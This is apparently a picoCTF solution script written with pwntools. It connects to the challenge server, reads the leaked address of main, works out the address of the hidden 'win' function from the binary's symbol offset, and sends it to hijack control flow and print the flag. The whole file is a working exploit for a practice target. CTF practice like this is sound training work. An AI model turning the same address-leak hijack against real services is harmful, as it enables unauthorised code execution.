from pwn import *
import re


context.log_level = 'critical'

FLAG_REGEX = r"picoCTF{?.*}"
binary = ELF("./Attached Files/vuln")

# Calculate the local offset (main - win)
offset = binary.symbols['main'] - binary.symbols['win']
#log.info(f"Calculated offset between main and win: {hex(offset)}")

# Connect to the remote server
p = remote('rescued-float.picoctf.net', 54881)

# Read until the string containing the address of main is found
p.recvuntil(b'Address of main: ')
main_addr_line = p.recvline().strip()
main_addr = int(main_addr_line, 16)
#log.info(f"Found main at: {hex(main_addr)}")

# Calculate the remote win function address using the offset
win_addr = main_addr - offset
#log.info(f"Found win function at: {hex(win_addr)}")

# Send the calculated address as input to the program
p.sendlineafter(b'Enter the address to jump to, ex => 0x12345: ', hex(win_addr).encode())

# Extract the flag from the response using a regex
print("\nFLAG: " + re.search(FLAG_REGEX, p.recvall().decode()).group(0))

